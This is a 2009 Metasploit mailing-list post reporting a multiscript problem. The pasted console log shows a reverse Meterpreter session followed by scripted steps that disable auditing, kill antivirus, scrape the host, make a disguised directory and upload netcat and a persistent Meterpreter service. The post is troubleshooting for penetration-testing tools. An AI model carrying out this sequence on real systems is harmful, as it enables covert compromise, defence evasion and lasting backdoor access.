Metasploit mailing list archives

multihandler rc :?


From: netevil at hackers.it (netevil)
Date: Fri, 02 Oct 2009 11:06:01 +0200

Carlos Perez wrote:
Fixed in SVN give it a try

Hi Carlos, updated and tried again...
but execution ends in half a second with te following on console...
and no results....

David

[*] Exploit running as background job.
[*] Starting the payload handler...
[*] Started reverse handler
msf exploit(handler) > [*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.253.128.106:8080 -> 
192.253.128.103:1219)
[*] Running Multiscript script.....
[*] Running script List ...
[*]     running command run disable_audit.rb
[*]     running command run migrate.rb
[*]     running command run killav.rb
[*]     running command run winenum.rb
[*]     running command run scraper.rb
[*]     running command cd c:\
[*]     running command mkdir ..-
[*]     running command cd ..-
[*]     running command mkdir giftbag
[*]     running command cd giftbag
[*]     running command upload /pentest/giftbag/psexec.exe psexec.exe
[*]     running command upload /pentest/giftbag/nc.exe nc.exe
[*]     running command upload /pentest/giftbag/metsrv.dll metsrv.dll
[*]     running command upload /pentest/giftbag/metsvc.exe metsvc.exe
[*]     running command upload /pentest/giftbag/metsvc-server.exe 
metsvc-server.exe


Current thread: